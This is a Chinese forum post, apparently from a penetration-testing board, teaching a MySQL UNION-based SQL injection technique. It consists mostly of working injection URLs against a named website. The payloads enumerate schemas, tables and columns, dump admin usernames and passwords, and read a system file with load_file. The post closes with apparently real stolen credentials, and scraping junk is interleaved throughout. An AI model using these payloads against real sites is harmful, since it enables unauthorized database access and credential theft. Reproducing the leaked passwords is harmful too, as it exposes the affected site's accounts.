中国网络渗透测试联盟
标题:
mysql注入高效方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:37
标题:
mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
! P( B& ~( T4 A2 _, L3 v
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
# H: c6 B3 i% w& _/ r$ ^
3 l& ^+ y2 V6 O- `4 ^6 t/ \
; p# L2 x- ]6 J
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
6 z y7 S: F4 d, D
. f( G" k+ P6 n) o) m! r
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
/ @. n0 S8 t; {8 h, d2 e0 B- I
4 n, g0 Z" d1 v
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
6 V$ E5 a; P1 R& ]% J% A
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
6 @6 [) X7 ~8 E1 u0 }1 s
* D3 l( W( j$ K8 X9 M
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
6 L3 L; D, p8 k2 L8 y( Y
0 I3 `! v* \9 v0 U2 `: q
读出所有库:
; F8 n7 r& Q( O
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
; V" a0 z5 U M& U' Y* s3 U
$ h% {8 l% j6 }: X% \1 W; F4 Z& ?
% s, x2 F- y, x: G4 S. R d: c
/ V* ]. D- g1 S; u% Y; ?8 A
读出所有表:
8 t* _5 ?2 ]1 u! a. ~9 ` {5 Q
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
+ h5 ~6 D. U+ N& c
' @- x0 {1 F7 w
读出所有表字段:
' a3 U& J$ `8 |# l6 ^( @) g
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
6 Q5 W) j* d& i1 D
*/ (97,100,109,105,110)为admin的ascii码 依次类推
; [( t: t0 ]0 T+ S7 D3 I \
% q- J( L/ ^( V, d
读出所有表字段里的内容:
7 C! q+ O' I0 [" c, i- _0 {% J3 O* o
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
2 H" H/ ?" V" G7 y. z2 |
8 \) ~2 ?$ d+ D
7 i) d* e+ P& }
7 ~* {) R$ ]5 \, j5 h: b
7 O% d, _ x" X: o6 F
5 Q" y- o A, F5 H5 S* V9 _# W; {
# ~6 ^! c7 F/ C2 p
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
) y: w* U5 s" p- K1 {( i Q( g
- \3 L: V3 ]' r$ X
, k9 X/ k7 v' Z V
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ c5 N4 l9 |) m& P# x' Y
" }, Q4 P+ v* d5 o+ B- x* g4 y& {
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
3 M+ p0 E3 O" S0 ?3 m/ {* e! Z
0 [! z! ~6 Z! p6 h" J
( w6 p+ \- W% v$ X
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
) K& @4 T, F T' p6 ?
. ?& {6 @/ r1 ~, s4 ^ H: S
0 P* E3 A) W4 p& B2 s' r
webmaster:dzb521123,simlab:simadmin20043233
" q( ]8 w, s% x5 ]& v
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2